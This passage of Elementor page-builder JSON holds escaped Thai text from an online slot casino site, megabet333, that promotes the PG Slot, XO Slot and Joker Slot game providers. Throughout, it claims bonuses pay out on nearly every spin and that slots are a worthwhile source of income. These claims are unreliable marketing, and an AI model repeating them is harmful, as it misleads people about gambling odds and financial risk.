\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 